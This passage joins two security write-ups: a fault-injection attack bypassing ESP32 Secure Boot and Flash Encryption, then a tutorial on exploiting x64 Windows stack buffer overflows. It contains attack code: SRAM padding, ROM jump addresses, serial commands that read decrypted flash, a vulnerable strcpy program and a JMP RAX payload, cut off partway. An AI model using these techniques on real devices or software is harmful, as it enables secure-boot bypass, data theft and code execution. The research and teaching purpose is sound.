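    def __init__(self):
        self.value = 0

    def program(self, requested):
        # Programming ORs the requested pattern in, so a 0 in `requested`
        # cannot clear a bit that is already 1.
        self.value |= requested
        return self.value

    def is_set(self, mask):
        return (self.value & mask) == mask


otp = OtpWord()
otp.program(DISABLE_DL_ENCRYPT | DISABLE_DL_DECRYPT | DISABLE_DL_CACHE)
otp.program(0)  # an attempt to "write zeros" changes nothing
```

In this model there is simply no operation that clears a bit, which mirrors why an attacker has to work around the configuration rather than revert it.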

Persistent data in SRAM

The SRAM that’s used by the ESP32 is typical technology that’s used by many chips. It’s commonly used for the ROM’s stack and for executing the first bootloader from flash. It’s convenient to use at early boot as it typically requires no configuration before it can be used.

We know from previous experience that the data stored in SRAM is persistent until it’s overwritten or the required power is removed from the physical cells. After a cold reset (i.e. power-cycle) of the chip, the SRAM will be reset to its default state. This state is often semi-random and unique per chip, as the default value for each bit (i.e. 0 or 1) is different.

However, after a warm reset, where the entire chip is reset without removing the power, it may happen that the data stored in SRAM remains unaffected. This persistence of the data is visualized in the picture below.

We decided to figure out if this behavior holds up for the ESP32 as well. We identified that the hardware watchdog can be used to issue a warm reset from software. This watchdog reset can also be issued when the chip is in UART bootloader boot mode and therefore we can use it to reset the ESP32 back into Normal boot mode.

Using some test code, loaded and executed in SRAM using the UART bootloader, we determined that the data in SRAM is indeed persistent after issuing a warm reset using the watchdog. Effectively this means we can boot the ESP32 in Normal boot mode with the SRAM filled with controlled data.

But… how can we (ab)use this?

Road to failure

We envisioned that we may be able to leverage the persistence of data in SRAM across warm resets for an attack. The first attack we came up with is to fill the SRAM with code using the UART bootloader and issue a warm reset using the watchdog. Then, we inject a glitch while the ROM code is overwriting this code with the flash bootloader during a normal boot.

We got this idea because, during our previous experiments, where we turned data transfers into code execution, we noticed that for some experiments the chip started executing from the entry address before the bootloader had finished copying.

Sometimes you just need to try it…

Attack code

The code that we load into the SRAM using the UART bootloader is shown below.

#define a "addi a6, a6, 1;"
#define t a a a a a a a a a a
#define h t t t t t t t t t t
#define d h h h h h h h h h h

void __attribute__((noreturn)) call_start_cpu0() {
    uint8_t cmd;

    ets_printf("SRAM CODE\n");

    while (1) {

        cmd = 0;
        uart_rx_one_char(&cmd);

        if(cmd == 'A') {                                    // 1
            *(unsigned int *)(0x3ff4808c) = 0x4001f880;
            *(unsigned int *)(0x3ff48090) = 0x00003a98;
            *(unsigned int *)(0x3ff4808c) = 0xc001f880;
        }
    }

    // The padding and the payload form one inline assembly statement;
    // adjacent string literals are concatenated by the compiler.
    asm volatile ( d                                        // 2

    "movi a6, 0x40; slli a6, a6, 24;"                       // 3
    "movi a7, 0x00; slli a7, a7, 16;"
    "xor a6, a6, a7;"
    "movi a7, 0x7c; slli a7, a7, 8;"
    "xor a6, a6, a7;"
    "movi a7, 0xf8;"
    "xor a6, a6, a7;"

    "movi a10, 0x52; callx8  a6;" // R
    "movi a10, 0x61; callx8  a6;" // a
    "movi a10, 0x65; callx8  a6;" // e
    "movi a10, 0x6C; callx8  a6;" // l
    "movi a10, 0x69; callx8  a6;" // i
    "movi a10, 0x7A; callx8  a6;" // z
    "movi a10, 0x65; callx8  a6;" // e
    "movi a10, 0x21; callx8  a6;" // !
    "movi a10, 0x0a; callx8  a6;" // \n
    );

    while(1);
}

To summarize, the above code implements the following:

  1. Command handler with a single command to perform a watchdog reset
  2. NOP-like padding using addi instructions
  3. Assembly for printing Raelize! on the serial interface

Please note, the listing’s numbers match the numbers in the code.

Timing

We target a reasonably small attack window at the start of F which is shown in the picture below. We know from previous experiments that during this moment the flash bootloader is copied.

The glitch must be injected before our code in SRAM is entirely overwritten by the valid flash bootloader.

Attack cycle

We took the following steps for each experiment to determine if the attack idea actually works. A successful glitch will print Raelize! on the serial interface.

  1. Set pin G0 to low and perform a cold reset to enter UART bootloader boot mode
  2. Use the load_ram command to execute our attack code from SRAM
  3. Send an A to the program to issue a warm reset into normal boot mode
  4. Inject a glitch while the flash bootloader is being copied by the ROM code

Results

After running these experiments for more than a day, resulting in more than 1 million experiments, we did not observe any successful glitch…

An unexpected result

Nonetheless, while analyzing the results, we noticed something unexpected.

The serial interface output for one of the experiments, which is shown below, indicated that the glitch caused an illegal instruction exception.

ets Jun  8 2016 00:22:57
rst:0x10 (RTCWDT_RTC_RESET),boot:0x13 (SPI_FAST_FLASH_BOOT)
configsip: 0, SPIWP:0xee
clk_drv:0x00,q_drv:0x00,d_drv:0x00,cs0_drv:0x00,hd_drv:0x00,wp_drv:0x00
mode:DIO, clock div:2
load:0x3fff0008,len:4
load:0x3fff000c,len:3220
load:0x40078000,len:4816
load:0x40080400,len:18640
entry 0x40080740
Fatal exception (0): IllegalInstruction
epc1=0x661b661b, epc2=0x00000000, epc3=0x00000000, 
excvaddr=0x00000000, depc=0x00000000

These types of exceptions happen quite often when glitches are injected into a chip. This was no different for the ESP32. For most of the exceptions the PC register is set to a value that’s expected (i.e. a valid address). It does not happen often that the PC register is set to such an interesting value.

The Illegal Instruction exception is caused as there is no valid instruction stored at the 0x661b661b address. We conclude this value must come from somewhere and that it cannot magically end up in the PC register.
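When running a million experiments, spotting such a value by eye is impractical. The following sketch shows one way the exception output could be parsed and flagged automatically. The function names and the "repeating 16-bit pattern" heuristic are our own illustrative assumptions, not part of the original tooling.

```python
import re

# Excerpt of the serial output shown above.
CRASH_LOG = """Fatal exception (0): IllegalInstruction
epc1=0x661b661b, epc2=0x00000000, epc3=0x00000000,
excvaddr=0x00000000, depc=0x00000000"""


def parse_exception(log):
    """Return (exception name, {register: value}) from a ROM crash dump."""
    cause = re.search(r"Fatal exception \((\d+)\): (\w+)", log)
    regs = {
        name: int(value, 16)
        for name, value in re.findall(r"(\w+)=0x([0-9a-fA-F]+)", log)
    }
    return (cause.group(2) if cause else None), regs


def is_repeating_pattern(pc):
    """Heuristic: a non-zero PC whose two 16-bit halves are identical."""
    return pc != 0 and (pc >> 16) == (pc & 0xFFFF)


name, regs = parse_exception(CRASH_LOG)
suspicious = is_repeating_pattern(regs["epc1"])
```

A PC value flagged this way is worth a closer look, because a repeating pattern is more likely to be data that was copied into the register than a genuine code address.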

We analyzed the code that we load into the SRAM in order to find an explanation. The binary code, of which a snippet is shown below, quickly gave us the answer we were looking for. The value 0x661b661b is easily identified in this binary image. It actually represents two addi a6, a6, 1 instructions of which we implemented 1000 in our test code.

00000000  e9 02 02 10 28 04 08 40  ee 00 00 00 00 00 00 00  |....(..@........|
00000010  00 00 00 00 00 00 00 01  00 00 ff 3f 0c 00 00 00  |...........?....|
00000020  53 52 41 4d 20 43 4f 44  45 0a 00 00 00 04 08 40  |SRAM CODE......@|
00000030  50 09 00 00 00 00 ff 3f  04 04 fe 3f 4d 04 08 40  |P......?...?M..@|
00000040  00 04 fe 3f 8c 80 f4 3f  90 80 f4 3f 98 3a 00 00  |...?...?...?.:..|
00000050  80 f8 01 c0 54 7d 00 40  d0 92 00 40 36 61 00 a1  |....T}.@...@6a..|
00000060  f5 ff 81 fc ff e0 08 00  0c 08 82 41 00 ad 01 81  |...........A....|
00000070  fa ff e0 08 00 82 01 00  4c 19 97 98 1f 81 ef ff  |........L.......|
00000080  91 ee ff 89 09 91 ee ff  89 09 91 f0 ff 81 ee ff  |................|
00000090  99 08 91 ef ff 81 eb ff  99 08 86 f2 ff 5c a9 97  |.............\..|
000000a0  98 c5 1b 66 1b 66 1b 66  1b 66 1b 66 1b 66 3e 0c  |...f.f.f.f.f.f>.|
000000b0  1b 66 1b 66 1b 66 1b 66  1b 66 1b 66 1b 66 1b 66  |.f.f.f.f.f.f.f.f|
000000c0  1b 66 1b 66 1b 66 1b 66  1b 66 1b 66 1b 66 1b 66  |.f.f.f.f.f.f.f.f|
000000d0  1b 66 1b 66 1b 66 1b 66  1b 66 1b 66 1b 66 1b 66  |.f.f.f.f.f.f.f.f|
...
00000330  1b 66 1b 66 1b 66 1b 66  1b 66 1b 66 1b 66 1b 66  |.f.f.f.f.f.f.f.f|
00000340  1b 66 1b 66 1b 66 1b 66  1b 66 1b 66 1b 66 1b 66  |.f.f.f.f.f.f.f.f|
00000350  1b 66 1b 66 1b 66 1b 66  1b 66 1b 66 1b 66 1b 66  |.f.f.f.f.f.f.f.f|

We just use these instructions as NOPs in order to create a landing zone, in a similar fashion to how a NOP sled is often used in software exploits. We did not anticipate these instructions would end up in the PC register.
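The relation between the bytes in the hexdump and the value in the PC register is just a little-endian 32-bit read. A short sketch, using eight bytes copied from the padding region of the dump:

```python
import struct

# Eight bytes from the padding region of the hexdump: four "1b 66" pairs,
# each pair being one addi a6, a6, 1 instruction according to the text.
padding = bytes.fromhex("1b 66 1b 66 1b 66 1b 66")

# Read them the way a little-endian CPU would load 32-bit words.
words = struct.unpack("<2I", padding)
as_hex = [hex(word) for word in words]
```

Each 32-bit word covers two of the two-byte instructions, which is why the PC value looks like the same 16-bit pattern repeated twice.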

Of course, we did not mind either. We concluded that we are able to load data from SRAM into the PC register when we inject a glitch while the flash bootloader is being copied by the ROM code.

We quickly realized, we now have all the ingredients to cook up an attack where we bypass Secure Boot and Flash Encryption using a single glitch. We reused some of the knowledge obtained during a previously described attack where we take control of the PC register.

Road to success

We reused most of the code that we previously loaded into SRAM using the UART bootloader. Only the payload (i.e. printing) that we intended to execute is removed as our strategy is now to set the PC register to an arbitrary value in order to take control.

#define a "addi a6, a6, 1;"
#define t a a a a a a a a a a
#define h t t t t t t t t t t
#define d h h h h h h h h h h

void __attribute__((noreturn)) call_start_cpu0() {
    uint8_t cmd;
   
    ets_printf("SRAM CODE\n");

    while (1) {

        cmd = 0;
        uart_rx_one_char(&cmd);

        if(cmd == 'A') {
            *(unsigned int *)(0x3ff4808c) = 0x4001f880;
            *(unsigned int *)(0x3ff48090) = 0x00003a98;
            *(unsigned int *)(0x3ff4808c) = 0xc001f880;
        }
    }

    asm volatile ( d );

    while(1);
}

After compiling the above code, we overwrite the addi instructions directly in the binary with the address pointer 0x4005a980. This address points to a function in the ROM code that prints something on the serial interface. This allows us to identify when we are successful.
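The patching step could be scripted roughly as follows. This is a sketch under our own assumptions, not the authors' tooling: the helper `patch_padding` is hypothetical, it simply targets the longest run of `1b 66` pairs in the image, and it ignores whether the pointers end up 4-byte aligned in memory, which a real patch would have to take into account.

```python
import struct

PAD_UNIT = bytes.fromhex("1b66")  # one addi a6, a6, 1 as seen in the hexdump


def patch_padding(image, pointer):
    """Overwrite the longest run of padding units with a repeated pointer."""
    best_start, best_len = -1, 0
    i = 0
    while i < len(image) - 1:
        if image[i:i + 2] == PAD_UNIT:
            j = i
            while image[j:j + 2] == PAD_UNIT:
                j += 2
            if j - i > best_len:
                best_start, best_len = i, j - i
            i = j
        else:
            i += 1
    if best_len < 4:
        raise ValueError("no padding run large enough for a pointer")
    count = best_len // 4  # number of whole 32-bit pointers that fit
    patched = bytearray(image)
    patched[best_start:best_start + 4 * count] = struct.pack("<I", pointer) * count
    return bytes(patched)


# Tiny synthetic image: two unrelated bytes, six padding units, one trailer byte.
demo = b"\xaa\xbb" + PAD_UNIT * 6 + b"\xcc"
patched_demo = patch_padding(demo, 0x4005A980)
```

The image keeps its original length, so headers and segment sizes in the binary stay valid after patching.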

We fixed the glitch parameters to that of the experiment that caused the Illegal Instruction exception. After a short while, we successfully identified several experiments during which the address pointer is loaded into the PC register. Effectively this provides us with control of the PC register and we can likely achieve arbitrary code execution.

Why does this work?

Good question. Not so easy to answer.

Unfortunately, we do not have a sound answer for you. We definitely did not anticipate that controlling the data at the destination could yield control of the PC register. We came up with a few possibilities, but we cannot say with full confidence if any of these is actually correct.

One explanation is that the glitch may corrupt both operands of the ldr instruction in order to load a value from the destination into a0. This is similar to the previously described attack where we control PC indirectly by controlling the source data.

Moreover, it’s a possibility that the ROM code implements functionality that facilitates this attack. In other words, we may execute valid code within the ROM due to our glitch that causes the value from SRAM to be loaded into the PC register.

More thorough investigation is required in order to determine what exactly allows us to perform this attack. However, from an attacker’s perspective, it’s sufficient to realize how to get control of PC in order to build the exploit.

Extracting plain-text data

Even though we have control of the PC register, we are not yet able to extract the plain-text data from the flash. We decided to leverage the UART bootloader functionality to do so.

We decided to jump directly to the UART bootloader while the chip is in Normal boot mode. For this attack we overwrite the addi instructions in the code that we load into SRAM with address pointers to the start of the UART bootloader (0x40007a19).

The UART bootloader prints a string on the serial interface which is shown below. We can use this to identify if we are successful or not.

waiting for download\n

Once we observe a successful experiment, we can simply use the esptool.py to issue a read_mem command in order to access plain-text flash data. The command below reads 4 bytes from the address where the external flash is mapped (0x3f400000).

esptool.py --no-stub --before no_reset --after no_reset read_mem 0x3f400000

Unfortunately, this did not work. For some reason the processor is replying with 0xbad00bad which is an indication we read from an unmapped page.

esptool.py v2.8
Serial port COM8
Connecting....
Detecting chip type... ESP32
Chip is ESP32D0WDQ6 (revision 1)
Crystal is 40MHz
MAC: 24:6f:28:24:75:08
Enabling default SPI flash mode...
0x3f400000 = 0xbad00bad
Staying in bootloader.

We noticed that there is quite some configuration done at the start of the UART bootloader. We assume it may affect the MMU as well.

Just to try something different, we decided to jump directly to the command handler of the UART bootloader itself (0x40007a4e). Once in the handler, we can send a raw read_mem command directly on the serial interface which is shown below.

target.write(b'\xc0\x00\x0a\x04\x00\x00\x00\x00\x00\x00\x00\x40\x3f\xc0')
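The raw bytes are easier to read once split into their fields. The sketch below rebuilds the same packet, assuming the framing used by the ESP32 ROM serial protocol as we understand it: SLIP delimiters (0xc0), a direction byte, a command byte (0x0a for reading a 32-bit value), a 16-bit data length, a 32-bit checksum field (zero here) and the little-endian address. The function names are ours.

```python
import struct

SLIP_END = b"\xc0"
READ_REG = 0x0A  # command byte seen in the raw packet above


def slip_encode(payload):
    """Frame a payload with SLIP delimiters, escaping special bytes."""
    escaped = payload.replace(b"\xdb", b"\xdb\xdd").replace(b"\xc0", b"\xdb\xdc")
    return SLIP_END + escaped + SLIP_END


def read_mem_packet(address):
    """Build a request that reads one 32-bit word at `address`."""
    data = struct.pack("<I", address)
    # direction (0x00 = request), command, data length, checksum (unused here)
    header = struct.pack("<BBHI", 0x00, READ_REG, len(data), 0)
    return slip_encode(header + data)


packet = read_mem_packet(0x3F400000)
```

Building the packet from fields makes it straightforward to read other addresses by changing only the argument.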

Unfortunately, when jumping directly to the handler, the string (i.e. waiting for download\n) is no longer printed, so we cannot easily identify successful experiments. We therefore decided to simply always send the command, regardless of whether we were successful or not. We used a very short serial interface timeout in order to minimize the overhead of almost always hitting the timeout.

After a short while, we observed the first successful experiments!

Conclusion

In this post we described an attack on the ESP32 where we bypass its Secure Boot and Flash Encryption features using a single EM glitch. Moreover, we leveraged the vulnerability exploited by this attack to extract the plain-text data from the encrypted flash.

We can use FIRM to break down the attack into multiple comprehensible stages.

Interestingly, two weaknesses of the ESP32 facilitated this attack. First, the UART bootloader cannot be disabled and is always accessible. Second, the data loaded in SRAM is persistent across warm resets and can therefore be filled with arbitrary data using the UART bootloader.

Espressif indicated in their advisory related to this attack that newer versions of the ESP32 include functionality to completely disable this feature.

Final thoughts

All standard embedded technologies are vulnerable to Fault Injection attacks. Therefore, it’s not surprising at all that the ESP32 is vulnerable as well. These types of chips are simply not made to be resilient against these types of attacks. However, and this is important, this does not mean that these attacks do not pose a risk.

Our research has shown that leveraging chip-level weaknesses for Fault Injection attacks is very effective. We have not seen many public examples yet, as most attacks still focus on traditional approaches where the focus is mostly on bypassing just a check.

We believe the full potential of Fault Injection attacks is still unexplored. Most research until recently focused mostly on the injection method itself (i.e. Activate, Inject and Glitch) compared to what can be accomplished due to a vulnerable chip (i.e. Fault, Exploit and Goal).

We are confident that creative usage of new and undefined fault models, will give rise to unforeseen attacks, where exciting exploitation strategies are used, for a wide variety of different goals.

Stack Based Buffer Overflows on x64 (Windows)

Original text by nytrosecurity

The previous two blog posts describe how a Stack Based Buffer Overflow vulnerability works on x86 (32 bits) Windows. In the first part, you can find a short introduction to x86 Assembly and how the stack works, and in the second part you can understand this vulnerability and find out how to exploit it.

This article will present a similar approach in order to understand how it is possible to exploit this vulnerability on x64 (64 bits) Windows. The first part will cover the differences in the Assembly code between x86 and x64 and the different function calling convention, and the second part will detail how these vulnerabilities can be exploited.

ASM for x64

There are multiple differences in Assembly that need to be understood in order to proceed. Here we will talk about the most important changes between x86 and x64 related to what we are going to do.

First of all, the registers are now the following:

  • The general purpose registers are the following: RAX, RBX, RCX, RDX, RSI, RDI, RBP and RSP. They are now 64 bit (8 bytes) instead of 32 bits (4 bytes).
  • The EAX, EBX, ECX, EDX, ESI, EDI, EBP, ESP registers represent the lower 4 bytes (the least significant 32 bits) of the previously mentioned registers.
  • There are a few new registers: R8, R9, R10, R11, R12, R13, R14, R15, also holding 64 bits.
  • It is possible to use R8d, R9d etc. in order to access the lower 4 bytes, as you can with EAX, EBX etc.
  • Pushing and popping data on the stack will use 64 bits instead of 32 bits
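The relationship between a 64-bit register and its 32-bit name can be modelled with simple masking. This is a small illustrative sketch with hypothetical helper names. It also models the x64 rule that writing a 32-bit register clears the upper 32 bits of the full register.

```python
MASK32 = 0xFFFFFFFF


def read_low32(reg64):
    """Value seen through the 32-bit name (e.g. EAX for RAX)."""
    return reg64 & MASK32


def write_low32(reg64, value):
    """Writing the 32-bit name zero-extends into the full 64-bit register."""
    return value & MASK32  # the old upper half of reg64 is discarded


rax = 0x1122334455667788
eax = read_low32(rax)        # lower 4 bytes only
rdx = write_low32(rax, 4)    # like "mov edx, 4" on a register holding old data
```

This zero-extension is why a compiler can load a small constant through the 32-bit name and still end up with the expected value in the full 64-bit register.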

Calling convention

Another important difference is the way functions are called, the calling convention.

Here are the most important things we need to know:

  • First 4 parameters are not placed on the stack. First 4 parameters are specified in the RCX, RDX, R8 and R9 registers.
  • If there are more than 4 parameters, the other parameters are placed on the stack, from left to right.
  • Similar to x86, the return value will be available in the RAX register.
  • The function caller will allocate stack space for the arguments passed in registers (called “shadow space” or “home space”). Even though the parameters are placed in registers when a function is called, the called function may need to modify those registers, so it needs some space to store them, and this space is on the stack. The function caller has to allocate this space before the function call and deallocate it after the function call. The function caller should allocate at least 32 bytes (for the 4 registers), even if they are not all used.
  • The stack has to be 16-byte aligned before any call instruction. Some functions might allocate 40 (0x28) bytes on the stack (32 bytes for the 4 registers and 8 bytes to align the stack from previous usage – the return RIP address pushed on the stack) for this purpose. You can find more details here.
  • Some registers are volatile and others are nonvolatile. This means that if we set some values in registers and call some function (e.g. Windows API), the volatile registers will probably change while the nonvolatile registers will preserve their values.

More details about calling convention on Windows can be found here.
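The 40 (0x28) byte figure follows from simple arithmetic, sketched below. The function `caller_allocation` is a hypothetical helper that only models the shadow space and alignment rules listed above; real compilers may pick a different, larger frame size.

```python
SHADOW_SPACE = 32    # home space for RCX, RDX, R8 and R9
RETURN_ADDRESS = 8   # pushed by the call that entered the current function


def caller_allocation(local_bytes=0, stack_args=0):
    """Smallest 'sub rsp, N' that keeps RSP 16-byte aligned at the next call."""
    needed = SHADOW_SPACE + 8 * stack_args + local_bytes
    needed = (needed + 7) // 8 * 8  # keep the stack in 8-byte slots
    # On entry RSP is 8 bytes off a 16-byte boundary because of the return
    # address, so the allocation plus those 8 bytes must be a multiple of 16.
    if (needed + RETURN_ADDRESS) % 16 != 0:
        needed += 8
    return needed


minimal = caller_allocation()                   # no locals, no stack arguments
with_locals = caller_allocation(local_bytes=16)
```

For a function with no locals that only calls functions taking up to four parameters, this gives 32 bytes of shadow space plus 8 bytes of padding.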

Function calling example

Let’s take a simple example in order to understand those things. Below is a function that does a simple addition, and it is called from main.

#include "stdafx.h"

int Add(long x, int y)
{
    int z = x + y;
    return z;
}

int main()
{
    Add(3, 4);
    return 0;
}

Here is a possible output, after removing all optimisations and security features.

Main function:

sub rsp,28
mov edx,4
mov ecx,3
call <consolex64.Add>
xor eax,eax
add rsp,28
ret

We can see the following:

  1. sub rsp,28 – This will allocate 0x28 (40) bytes on the stack, as we previously discussed: 32 bytes for the register arguments and 8 bytes for alignment.
  2. mov edx,4 – This places the second parameter in the EDX register. Since the value fits in 32 bits there is no need to use RDX: writing to EDX zero-extends into RDX, so the result is the same.
  3. mov ecx,3 – The value of the first argument is placed in the ECX register.
  4. call <consolex64.Add> – Call the “Add” function.
  5. xor eax,eax – Set EAX (or RAX) to 0, as it will be the return value of main.
  6. add rsp,28 – Clears the allocated stack space.
  7. ret – Return from main.

Add function:

mov dword ptr ss:[rsp+10],edx
mov dword ptr ss:[rsp+8],ecx
sub rsp,18
mov eax,dword ptr ss:[rsp+28]
mov ecx,dword ptr ss:[rsp+20]
add ecx,eax
mov eax,ecx
mov dword ptr ss:[rsp],eax
mov eax,dword ptr ss:[rsp]
add rsp,18
ret

Let’s see how this function works:

  1. mov dword ptr ss:[rsp+10],edx – As we know, the arguments are passed in the ECX and EDX registers. But what if the function needs to use those registers for something else? (Note that some registers must be preserved across a function call: RBX, RBP, RDI, RSI, R12, R13, R14 and R15.) In this case, the function uses the “shadow space” (“home space”) allocated by the caller. This instruction saves the second argument (the value 4) from the EDX register into the shadow space.
  2. mov dword ptr ss:[rsp+8],ecx – Similar to the previous instruction, this one saves the first argument (value 3) from the ECX register on the stack.
  3. sub rsp,18 – Allocate 0x18 (24) bytes on the stack. This function does not call other functions, so it does not need to allocate the 32 bytes of shadow space, and it is not required to keep the stack 16-byte aligned. I am not sure why it allocates 24 bytes; it looks like the “local variables area” on the stack has to be aligned to 16 bytes and the other 8 bytes might be used for the stack alignment (as previously mentioned).
  4. mov eax,dword ptr ss:[rsp+28] – Will place in EAX register the value of the second parameter (value 4).
  5. mov ecx,dword ptr ss:[rsp+20] – Will place in ECX register the value of the first parameter (value 3).
  6. add ecx,eax – Will add to ECX the value of the EAX register, so ECX will become 7.
  7. mov eax,ecx – Will save the same value (the sum) into EAX register.
  8. mov dword ptr ss:[rsp],eax and mov eax,dword ptr ss:[rsp] – These store the sum in the local variable z and immediately reload it as the return value. They are a side effect of disabling optimizations and do nothing useful.
  9. add rsp,18 – Cleanup the allocated stack space.
  10. ret – Return from the function.
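The offsets used in the Add function can be checked with a little arithmetic. The following Python sketch (home_slot_offset is a hypothetical helper name, not something from the original listing) computes where the home slot of a register argument sits relative to RSP, both on function entry and after the function has reserved its own stack frame.

```python
RETURN_ADDRESS_SIZE = 8  # the CALL instruction pushes an 8-byte return address
SLOT_SIZE = 8            # every home slot is 8 bytes wide


def home_slot_offset(arg_index, local_frame_size=0):
    """Offset from RSP of the home slot for register argument arg_index (0-based).

    local_frame_size is the amount subtracted from RSP by the callee
    (0 right at function entry).
    """
    return local_frame_size + RETURN_ADDRESS_SIZE + SLOT_SIZE * arg_index


# On entry to Add: ECX is saved at [rsp+8], EDX at [rsp+10].
print(hex(home_slot_offset(0)), hex(home_slot_offset(1)))

# After "sub rsp,18" the same slots are read back at [rsp+20] and [rsp+28].
print(hex(home_slot_offset(0, 0x18)), hex(home_slot_offset(1, 0x18)))
```

This is why the function writes the arguments to [rsp+8] and [rsp+10] but reads them back from [rsp+20] and [rsp+28]: the slots did not move, RSP did.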

Exploitation

Let’s see now how it would be possible to exploit a Stack Based Buffer Overflow on x64. The idea is similar to x86: we overwrite the stack until we overwrite the return address. At that point we can control program execution. This is the easiest example to understand this vulnerability.

We will have a simple program, such as this one:

void Copy(const char *p)
{
    char buffer[40];
    strcpy(buffer, p);
}

int main()
{
    Copy("Test");
    return 0;
}

We have a 40-byte buffer and a function that copies a string into that buffer without checking its length.

This will be the assembly code of the main function:

sub rsp,28                       ; Allocate space on the stack
lea rcx,qword ptr ds:[1400021F0] ; Put in RCX the string ("Test")
call <consolex64.Copy>           ; Call the Copy function
xor eax,eax                      ; EAX = 0, return value
add rsp,28                       ; Cleanup the stack space
ret                              ; return

And this will be the assembly code for the Copy function:

mov qword ptr ss:[rsp+8],rcx  ; Save the RCX on the stack
sub rsp,58                    ; Allocate space on the stack
mov rdx,qword ptr ss:[rsp+60] ; Put in RDX the "Test" string (second parameter to strcpy)
lea rcx,qword ptr ss:[rsp+20] ; Put in RCX the buffer (first parameter to strcpy)
call <consolex64.strcpy>      ; Call strcpy function
add rsp,58                    ; Cleanup the stack
ret                           ; Return from function

Let’s modify the Copy function call to the following:

Copy("1111111122222222333333334444444455555555");

The string has 40 bytes, so it exactly fills our buffer (note, however, that strcpy also writes a terminating NULL byte after the string, so the copy already spills one byte past the buffer; using the full 40 bytes just makes the buffer easier to see on the stack).

This is what the stack will look like after the strcpy function call:

000000000012FE90 000007FEEE7E5D98 ; Unused stack space
000000000012FE98 00000001400021C8 ; Unused stack space
000000000012FEA0 0000000000000000 ; Unused stack space
000000000012FEA8 00000001400021C8 ; Unused stack space
000000000012FEB0 3131313131313131 ; "11111111"
000000000012FEB8 3232323232323232 ; "22222222"
000000000012FEC0 3333333333333333 ; "33333333"
000000000012FEC8 3434343434343434 ; "44444444"
000000000012FED0 3535353535353535 ; "55555555"
000000000012FED8 0000000000000000 ; Unused stack space
000000000012FEE0 00000001400021A0 ; Unused stack space
000000000012FEE8 0000000140001030 ; Return address

As you can probably see, we need to add an extra 24 bytes to overwrite the return address: 16 bytes for the unused stack space and 8 bytes for the return address itself. Let’s modify the Copy function call to the following:

Copy("11111111222222223333333344444444555555556666666677777777AAAAAAAA");

This will overwrite the return address with “AAAAAAAA”.
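The distance to the return address can also be derived directly from the stack dump instead of counting rows. Here is a small Python sketch using the two addresses from my dump (they will differ on your machine); build_pattern is a helper name I made up for this illustration.

```python
BUFFER_START = 0x12FEB0         # address of the "11111111" row in the dump
RETURN_ADDRESS_SLOT = 0x12FEE8  # address of the "Return address" row


def build_pattern(offset, marker=b"A", marker_len=8):
    """Fill `offset` bytes with 8-byte groups of '1', '2', ... then append the marker."""
    groups, remainder = divmod(offset, 8)
    filler = b"".join(str(d % 10).encode() * 8 for d in range(1, groups + 1))
    filler += b"X" * remainder  # pad if the offset is not a multiple of 8
    return filler + marker * marker_len


offset = RETURN_ADDRESS_SLOT - BUFFER_START
payload = build_pattern(offset)
print(offset, payload.decode())
```

The offset comes out as 56 (0x38): the 40-byte buffer plus the 16 bytes of unused stack space, which matches the string passed to Copy above.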

NULL byte problem

In our case, a call to the “strcpy” function creates the vulnerability. It is important to understand that “strcpy” stops copying data when it encounters the first NULL byte. For us, this means that we cannot have NULL bytes in our payload.

This is a problem for a simple reason: the addresses that we might use contain NULL bytes. For example, these are the addresses in my case:

0000000140001000 | 48 89 4C 24 08 | mov qword ptr ss:[rsp+8],rcx 
0000000140001005 | 48 83 EC 58    | sub rsp,58 
0000000140001009 | 48 8B 54 24 60 | mov rdx,qword ptr ss:[rsp+60] 
000000014000100E | 48 8D 4C 24 20 | lea rcx,qword ptr ss:[rsp+20] 
0000000140001013 | E8 04 0B 00 00 | call <consolex64.strcpy>
0000000140001018 | 48 83 C4 58    | add rsp,58 
000000014000101C | C3             | ret

If we wanted to proceed as in the 32-bit example, we would have to overwrite the return address with an address such as 000000014000101C where there would be a “JMP RSP” instruction, and continue with our shellcode after this address. As you can see, this is not possible, because the address contains NULL bytes.

So, what can we do? We need a workaround. A simple and useful trick is to partially overwrite the return address: instead of overwriting all 8 bytes of the address, we overwrite only its low-order 4, 5 or 6 bytes (the ones stored first in memory on a little-endian machine) and leave the high-order bytes, which are already zero, untouched. Let’s modify the function call to overwrite only the low 5 bytes by removing 3 “A”s from our payload. The function call will be the following:

Copy("11111111222222223333333344444444555555556666666677777777AAAAA");

Before the “RET” instruction, the stack will look like this:

000000000012FED8 3636363636363636 ; Part of our payload
000000000012FEE0 3737373737373737 ; Part of our payload
000000000012FEE8 0000004141414141 ; Return address
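The value in the return address slot can be reproduced with a short simulation. This Python sketch models the 64 bytes from the start of the buffer to the end of the return address and mimics what strcpy does; simulate_strcpy is a hypothetical helper, and the original return address is the one from my earlier stack dump.

```python
import struct

ORIGINAL_RETURN_ADDRESS = 0x0000000140001030  # value from the earlier stack dump
OFFSET_TO_RETURN = 56                         # buffer (40) + unused space (16)


def simulate_strcpy(stack, offset, data):
    """Copy data plus a terminating NUL into stack at offset, like strcpy does."""
    if b"\x00" in data:
        data = data[: data.index(b"\x00")]  # strcpy stops at the first NUL
    copied = data + b"\x00"
    stack[offset : offset + len(copied)] = copied
    return stack


# 56 bytes up to the return address, then the little-endian return address.
frame = bytearray(OFFSET_TO_RETURN) + bytearray(struct.pack("<Q", ORIGINAL_RETURN_ADDRESS))

payload = b"1" * OFFSET_TO_RETURN + b"A" * 5
simulate_strcpy(frame, 0, payload)

new_return = struct.unpack_from("<Q", frame, OFFSET_TO_RETURN)[0]
print(f"{new_return:016X}")  # 0000004141414141
```

The five “A” bytes replace the low five bytes, the terminating NULL lands on the sixth byte, and the two highest bytes keep their original zero values.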

As you can see, we are able to specify a valid address, so we solved our first issue. However, since we cannot add anything else after this, as we need NULL bytes to have a valid address, how can we exploit this vulnerability?

Let’s take a look at the registers, maybe we can find an easy win. Here are the registers before the RET instruction:

Win64 registers

We can see that in the RAX register we can find the address where our payload is stored. This happens for a simple reason: strcpy function will copy the string to the buffer and it will return the address of the buffer. As we already know, the returned data from a function call will be saved in RAX register, so we will have access to our payload using RAX register.

Now, our exploitation is simple:

  1. We have our payload address in RAX register
  2. We find a “JMP RAX” instruction
  3. We specify the address of that instruction as return address

We can easily find some “JMP RAX” instructions:

JMP RAX

We will take one of them, one that does not contain NULL bytes in the middle, and we can create the payload:

  1. 56 bytes of shellcode (the amount required to reach the return address). We will use 0xCC (the INT 3 instruction, a breakpoint that pauses execution of the program in the debugger)
  2. 4 bytes of return address, the “JMP RAX” instruction that we previously found

This is what the function call will look like:

 Copy("\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC"
